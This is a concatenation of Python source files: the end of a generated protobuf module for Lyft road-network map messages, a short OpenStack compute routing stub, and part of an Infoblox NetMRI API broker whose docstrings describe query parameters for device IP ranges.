DailyTimeInterval = _reflection.GeneratedProtocolMessageType('DailyTimeInterval', (_message.Message,), {
'DESCRIPTOR' : _DAILYTIMEINTERVAL,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.DailyTimeInterval)
})
_sym_db.RegisterMessage(DailyTimeInterval)
Schedule = _reflection.GeneratedProtocolMessageType('Schedule', (_message.Message,), {
'DESCRIPTOR' : _SCHEDULE,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.Schedule)
})
_sym_db.RegisterMessage(Schedule)
Condition = _reflection.GeneratedProtocolMessageType('Condition', (_message.Message,), {
'DESCRIPTOR' : _CONDITION,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.Condition)
})
_sym_db.RegisterMessage(Condition)
RoadNetworkSegment = _reflection.GeneratedProtocolMessageType('RoadNetworkSegment', (_message.Message,), {
'LaneSet' : _reflection.GeneratedProtocolMessageType('LaneSet', (_message.Message,), {
'DESCRIPTOR' : _ROADNETWORKSEGMENT_LANESET,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.RoadNetworkSegment.LaneSet)
})
,
'DESCRIPTOR' : _ROADNETWORKSEGMENT,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.RoadNetworkSegment)
})
_sym_db.RegisterMessage(RoadNetworkSegment)
_sym_db.RegisterMessage(RoadNetworkSegment.LaneSet)
Junction = _reflection.GeneratedProtocolMessageType('Junction', (_message.Message,), {
'DESCRIPTOR' : _JUNCTION,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.Junction)
})
_sym_db.RegisterMessage(Junction)
Lane = _reflection.GeneratedProtocolMessageType('Lane', (_message.Message,), {
'Boundary' : _reflection.GeneratedProtocolMessageType('Boundary', (_message.Message,), {
'DESCRIPTOR' : _LANE_BOUNDARY,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.Lane.Boundary)
})
,
'DESCRIPTOR' : _LANE,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.Lane)
})
_sym_db.RegisterMessage(Lane)
_sym_db.RegisterMessage(Lane.Boundary)
TrafficControlElement = _reflection.GeneratedProtocolMessageType('TrafficControlElement', (_message.Message,), {
'PedestrianCrosswalk' : _reflection.GeneratedProtocolMessageType('PedestrianCrosswalk', (_message.Message,), {
'DESCRIPTOR' : _TRAFFICCONTROLELEMENT_PEDESTRIANCROSSWALK,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.TrafficControlElement.PedestrianCrosswalk)
})
,
'AuxiliaryElement' : _reflection.GeneratedProtocolMessageType('AuxiliaryElement', (_message.Message,), {
'DESCRIPTOR' : _TRAFFICCONTROLELEMENT_AUXILIARYELEMENT,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.TrafficControlElement.AuxiliaryElement)
})
,
'TrafficLightFaceState' : _reflection.GeneratedProtocolMessageType('TrafficLightFaceState', (_message.Message,), {
'YieldSet' : _reflection.GeneratedProtocolMessageType('YieldSet', (_message.Message,), {
'DESCRIPTOR' : _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE_YIELDSET,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.TrafficControlElement.TrafficLightFaceState.YieldSet)
})
,
'DESCRIPTOR' : _TRAFFICCONTROLELEMENT_TRAFFICLIGHTFACESTATE,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.TrafficControlElement.TrafficLightFaceState)
})
,
'TrafficLight' : _reflection.GeneratedProtocolMessageType('TrafficLight', (_message.Message,), {
'DESCRIPTOR' : _TRAFFICCONTROLELEMENT_TRAFFICLIGHT,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.TrafficControlElement.TrafficLight)
})
,
'DESCRIPTOR' : _TRAFFICCONTROLELEMENT,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.TrafficControlElement)
})
_sym_db.RegisterMessage(TrafficControlElement)
_sym_db.RegisterMessage(TrafficControlElement.PedestrianCrosswalk)
_sym_db.RegisterMessage(TrafficControlElement.AuxiliaryElement)
_sym_db.RegisterMessage(TrafficControlElement.TrafficLightFaceState)
_sym_db.RegisterMessage(TrafficControlElement.TrafficLightFaceState.YieldSet)
_sym_db.RegisterMessage(TrafficControlElement.TrafficLight)
SegmentSequence = _reflection.GeneratedProtocolMessageType('SegmentSequence', (_message.Message,), {
'SegmentWithOrientation' : _reflection.GeneratedProtocolMessageType('SegmentWithOrientation', (_message.Message,), {
'DESCRIPTOR' : _SEGMENTSEQUENCE_SEGMENTWITHORIENTATION,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.SegmentSequence.SegmentWithOrientation)
})
,
'DESCRIPTOR' : _SEGMENTSEQUENCE,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.SegmentSequence)
})
_sym_db.RegisterMessage(SegmentSequence)
_sym_db.RegisterMessage(SegmentSequence.SegmentWithOrientation)
LaneSequence = _reflection.GeneratedProtocolMessageType('LaneSequence', (_message.Message,), {
'DESCRIPTOR' : _LANESEQUENCE,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.LaneSequence)
})
_sym_db.RegisterMessage(LaneSequence)
LaneSequences = _reflection.GeneratedProtocolMessageType('LaneSequences', (_message.Message,), {
'DESCRIPTOR' : _LANESEQUENCES,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.LaneSequences)
})
_sym_db.RegisterMessage(LaneSequences)
Polygon = _reflection.GeneratedProtocolMessageType('Polygon', (_message.Message,), {
'DESCRIPTOR' : _POLYGON,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.Polygon)
})
_sym_db.RegisterMessage(Polygon)
MultiPolygon = _reflection.GeneratedProtocolMessageType('MultiPolygon', (_message.Message,), {
'DESCRIPTOR' : _MULTIPOLYGON,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.MultiPolygon)
})
_sym_db.RegisterMessage(MultiPolygon)
AnnotatedShape = _reflection.GeneratedProtocolMessageType('AnnotatedShape', (_message.Message,), {
'Building' : _reflection.GeneratedProtocolMessageType('Building', (_message.Message,), {
'DESCRIPTOR' : _ANNOTATEDSHAPE_BUILDING,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.AnnotatedShape.Building)
})
,
'Region' : _reflection.GeneratedProtocolMessageType('Region', (_message.Message,), {
'DESCRIPTOR' : _ANNOTATEDSHAPE_REGION,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.AnnotatedShape.Region)
})
,
'DESCRIPTOR' : _ANNOTATEDSHAPE,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.AnnotatedShape)
})
_sym_db.RegisterMessage(AnnotatedShape)
_sym_db.RegisterMessage(AnnotatedShape.Building)
_sym_db.RegisterMessage(AnnotatedShape.Region)
LatLngBox = _reflection.GeneratedProtocolMessageType('LatLngBox', (_message.Message,), {
'DESCRIPTOR' : _LATLNGBOX,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.LatLngBox)
})
_sym_db.RegisterMessage(LatLngBox)
MapElement = _reflection.GeneratedProtocolMessageType('MapElement', (_message.Message,), {
'Element' : _reflection.GeneratedProtocolMessageType('Element', (_message.Message,), {
'DESCRIPTOR' : _MAPELEMENT_ELEMENT,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.MapElement.Element)
})
,
'AssociatedConditions' : _reflection.GeneratedProtocolMessageType('AssociatedConditions', (_message.Message,), {
'DESCRIPTOR' : _MAPELEMENT_ASSOCIATEDCONDITIONS,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.MapElement.AssociatedConditions)
})
,
'DebugInfoEntry' : _reflection.GeneratedProtocolMessageType('DebugInfoEntry', (_message.Message,), {
'DESCRIPTOR' : _MAPELEMENT_DEBUGINFOENTRY,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.MapElement.DebugInfoEntry)
})
,
'DESCRIPTOR' : _MAPELEMENT,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.MapElement)
})
_sym_db.RegisterMessage(MapElement)
_sym_db.RegisterMessage(MapElement.Element)
_sym_db.RegisterMessage(MapElement.AssociatedConditions)
_sym_db.RegisterMessage(MapElement.DebugInfoEntry)
MapFragment = _reflection.GeneratedProtocolMessageType('MapFragment', (_message.Message,), {
'DESCRIPTOR' : _MAPFRAGMENT,
'__module__' : 'road_network_pb2'
# @@protoc_insertion_point(class_scope:pb.lyft.maps.MapFragment)
})
_sym_db.RegisterMessage(MapFragment)
DESCRIPTOR._options = None
_MAPELEMENT_DEBUGINFOENTRY._options = None
# @@protoc_insertion_point(module_scope)
# jumpgate/compute/drivers/openstack.py
# (repo: Neetuj/jumpgate, license: MIT)
from jumpgate.common.openstack import setup_responder


def setup_routes(app, disp):
    return setup_responder(app, disp, 'compute')
# infoblox_netmri/api/broker/v3_8_0/device_ip_range_broker.py
# (repo: infobloxopen/infoblox_netmri, license: Apache-2.0)
from ..broker import Broker
class DeviceIpRangeBroker(Broker):
controller = "device_ip_ranges"
def show(self, **kwargs):
"""Shows the details for the specified device ip range.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param DeviceIPRangeID: The internal NetMRI identifier for the ip address range definition.
:type DeviceIPRangeID: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of device ip range methods. The listed methods will be called on each device ip range returned and included in the output. Available methods are: device_object, data_source, device.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: device_object, data_source, device.
:type include: Array of String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return device_ip_range: The device ip range identified by the specified DeviceIPRangeID.
:rtype device_ip_range: DeviceIpRange
"""
return self.api_request(self._get_method_fullname("show"), kwargs)
def index(self, **kwargs):
"""Lists the available device ip ranges. Any of the inputs listed may be be used to narrow the list; other inputs will be ignored. Of the various ways to query lists, using this method is most efficient.
**Inputs**
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device to which this flow belongs.
:type DeviceID: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceIPRangeID: The internal NetMRI identifier for the ip address range definition.
:type DeviceIPRangeID: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceObjectID: The internal NetMRI identifier for the service to which this flow belongs.
:type DeviceObjectID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the device ip ranges as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of device ip range methods. The listed methods will be called on each device ip range returned and included in the output. Available methods are: device_object, data_source, device.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: device_object, data_source, device.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` DeviceIPRangeID
:param sort: The data field(s) to use for sorting the output. Default is DeviceIPRangeID. Valid values are DeviceIPRangeID, DeviceID, DeviceObjectID, DataSourceID, IprFirstSeenTime, IprStartTime, IprEndTime, IprTimestamp, IprChangedCols, IprIPVersion, IprDisplayText, IprIPNumericMin, IprIPNumericMax.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each DeviceIpRange. Valid values are DeviceIPRangeID, DeviceID, DeviceObjectID, DataSourceID, IprFirstSeenTime, IprStartTime, IprEndTime, IprTimestamp, IprChangedCols, IprIPVersion, IprDisplayText, IprIPNumericMin, IprIPNumericMax. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return device_ip_ranges: An array of the DeviceIpRange objects that match the specified input criteria.
:rtype device_ip_ranges: Array of DeviceIpRange
"""
return self.api_list_request(self._get_method_fullname("index"), kwargs)
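    # The index method above pages its results via the ``start`` and ``limit``
    # inputs. A minimal, hypothetical sketch of walking every page follows;
    # ``iter_all`` and the ``fetch_page`` callable are illustrative helpers,
    # not part of this client.

```python
# Hypothetical pagination helper, not part of DeviceIpRangeBroker: walks a
# NetMRI-style paged endpoint by advancing `start` in steps of `limit`.
def iter_all(fetch_page, limit=1000):
    start = 0
    while True:
        page = fetch_page(start=start, limit=limit)
        for record in page:
            yield record
        if len(page) < limit:  # a short page means no more data
            return
        start += limit
```

    # With a real broker this might be wired up as
    # ``fetch_page=lambda **kw: broker.index(**kw)``; note the 10000 maximum
    # on ``limit`` documented above.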
def search(self, **kwargs):
"""Lists the available device ip ranges matching the input criteria. This method provides a more flexible search interface than the index method, but searching using this method is more demanding on the system and will not perform to the same level as the index method. The input fields listed below will be used as in the index method, to filter the result, along with the optional query string and XML filter described below.
**Inputs**
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record.
:type DataSourceID: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device to which this flow belongs.
:type DeviceID: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceIPRangeID: The internal NetMRI identifier for the ip address range definition.
:type DeviceIPRangeID: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceObjectID: The internal NetMRI identifier for the service to which this flow belongs.
:type DeviceObjectID: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param IprChangedCols: The fields that changed between this revision of the record and the previous revision.
:type IprChangedCols: Array of String
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param IprDisplayText: The text that was defined in the configuration for this ip address range.
:type IprDisplayText: Array of String
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param IprEndTime: The ending effective time of this record, or empty if still in effect.
:type IprEndTime: Array of DateTime
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param IprFirstSeenTime: The timestamp of when NetMRI saw for the first time this flow.
:type IprFirstSeenTime: Array of DateTime
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param IprIPNumericMax: The numeric value for the range max value.
:type IprIPNumericMax: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param IprIPNumericMin: The numeric value for the range min value.
:type IprIPNumericMin: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param IprIPVersion: The ip version for this range: 4 or 6.
:type IprIPVersion: Array of Integer
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param IprStartTime: The starting effective time of this record.
:type IprStartTime: Array of DateTime
| ``api version min:`` 2.6
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param IprTimestamp: The date and time this record was collected or calculated.
:type IprTimestamp: Array of DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the device ip ranges as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of device ip range methods. The listed methods will be called on each device ip range returned and included in the output. Available methods are: device_object, data_source, device.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: device_object, data_source, device.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` DeviceIPRangeID
:param sort: The data field(s) to use for sorting the output. Default is DeviceIPRangeID. Valid values are DeviceIPRangeID, DeviceID, DeviceObjectID, DataSourceID, IprFirstSeenTime, IprStartTime, IprEndTime, IprTimestamp, IprChangedCols, IprIPVersion, IprDisplayText, IprIPNumericMin, IprIPNumericMax.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each DeviceIpRange. Valid values are DeviceIPRangeID, DeviceID, DeviceObjectID, DataSourceID, IprFirstSeenTime, IprStartTime, IprEndTime, IprTimestamp, IprChangedCols, IprIPVersion, IprDisplayText, IprIPNumericMin, IprIPNumericMax. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param query: This value will be matched against device ip ranges, looking to see if one or more of the listed attributes contain the passed value. You may also surround the value with '/' and '/' to perform a regular expression search rather than a containment operation. Any record that matches will be returned. The attributes searched are: DataSourceID, DeviceID, DeviceIPRangeID, DeviceObjectID, IprChangedCols, IprDisplayText, IprEndTime, IprFirstSeenTime, IprIPNumericMax, IprIPNumericMin, IprIPVersion, IprStartTime, IprTimestamp.
:type query: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Note that this kind of filter may be costly and inefficient if not combined with database-level filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return device_ip_ranges: An array of the DeviceIpRange objects that match the specified input criteria.
:rtype device_ip_ranges: Array of DeviceIpRange
"""
return self.api_list_request(self._get_method_fullname("search"), kwargs)
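    # The find method that follows takes per-field operator triplets:
    # ``op_<Field>`` plus either ``val_c_<Field>`` (constant) or
    # ``val_f_<Field>`` (another field name). A small hypothetical helper,
    # not part of this client, that assembles such kwargs:

```python
# Hypothetical helper (illustrative only): build the op_/val_c_ keyword pair
# that find() expects when comparing one field against a constant value.
def constant_filter(field, op, value):
    return {
        "op_" + field: op,
        "val_c_" + field: str(value),
    }

# e.g. broker.find(**constant_filter("DeviceID", ">=", 100)) would list the
# device ip ranges whose DeviceID is at least 100 (assuming a live broker).
```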
def find(self, **kwargs):
"""Lists the available device ip ranges matching the input specification. This provides the most flexible search specification of all the query mechanisms, enabling searching using comparison operations other than equality. However, it is more complex to use and will not perform as efficiently as the index or search methods. In the input descriptions below, 'field names' refers to the following fields: DataSourceID, DeviceID, DeviceIPRangeID, DeviceObjectID, IprChangedCols, IprDisplayText, IprEndTime, IprFirstSeenTime, IprIPNumericMax, IprIPNumericMin, IprIPVersion, IprStartTime, IprTimestamp.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DataSourceID: The operator to apply to the field DataSourceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DataSourceID: If op_DataSourceID is specified, the field named in this input will be compared to the value in DataSourceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DataSourceID must be specified if op_DataSourceID is specified.
:type val_f_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DataSourceID: If op_DataSourceID is specified, this value will be compared to the value in DataSourceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DataSourceID must be specified if op_DataSourceID is specified.
:type val_c_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceID: The operator to apply to the field DeviceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceID: The internal NetMRI identifier for the device to which this flow belongs. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceID: If op_DeviceID is specified, the field named in this input will be compared to the value in DeviceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceID must be specified if op_DeviceID is specified.
:type val_f_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceID: If op_DeviceID is specified, this value will be compared to the value in DeviceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceID must be specified if op_DeviceID is specified.
:type val_c_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceIPRangeID: The operator to apply to the field DeviceIPRangeID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceIPRangeID: The internal NetMRI identifier for the ip address range definition. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceIPRangeID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceIPRangeID: If op_DeviceIPRangeID is specified, the field named in this input will be compared to the value in DeviceIPRangeID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceIPRangeID must be specified if op_DeviceIPRangeID is specified.
:type val_f_DeviceIPRangeID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceIPRangeID: If op_DeviceIPRangeID is specified, this value will be compared to the value in DeviceIPRangeID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceIPRangeID must be specified if op_DeviceIPRangeID is specified.
:type val_c_DeviceIPRangeID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceObjectID: The operator to apply to the field DeviceObjectID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceObjectID: The internal NetMRI identifier for the service to which this flow belongs. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceObjectID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceObjectID: If op_DeviceObjectID is specified, the field named in this input will be compared to the value in DeviceObjectID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceObjectID must be specified if op_DeviceObjectID is specified.
:type val_f_DeviceObjectID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceObjectID: If op_DeviceObjectID is specified, this value will be compared to the value in DeviceObjectID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceObjectID must be specified if op_DeviceObjectID is specified.
:type val_c_DeviceObjectID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_IprChangedCols: The operator to apply to the field IprChangedCols. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. IprChangedCols: The fields that changed between this revision of the record and the previous revision. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_IprChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_IprChangedCols: If op_IprChangedCols is specified, the field named in this input will be compared to the value in IprChangedCols using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_IprChangedCols must be specified if op_IprChangedCols is specified.
:type val_f_IprChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_IprChangedCols: If op_IprChangedCols is specified, this value will be compared to the value in IprChangedCols using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_IprChangedCols must be specified if op_IprChangedCols is specified.
:type val_c_IprChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_IprDisplayText: The operator to apply to the field IprDisplayText. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. IprDisplayText: The text that was defined in the configuration for this ip address range. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_IprDisplayText: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_IprDisplayText: If op_IprDisplayText is specified, the field named in this input will be compared to the value in IprDisplayText using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_IprDisplayText must be specified if op_IprDisplayText is specified.
:type val_f_IprDisplayText: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_IprDisplayText: If op_IprDisplayText is specified, this value will be compared to the value in IprDisplayText using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_IprDisplayText must be specified if op_IprDisplayText is specified.
:type val_c_IprDisplayText: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_IprEndTime: The operator to apply to the field IprEndTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. IprEndTime: The ending effective time of this record, or empty if still in effect. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_IprEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_IprEndTime: If op_IprEndTime is specified, the field named in this input will be compared to the value in IprEndTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_IprEndTime must be specified if op_IprEndTime is specified.
:type val_f_IprEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_IprEndTime: If op_IprEndTime is specified, this value will be compared to the value in IprEndTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_IprEndTime must be specified if op_IprEndTime is specified.
:type val_c_IprEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
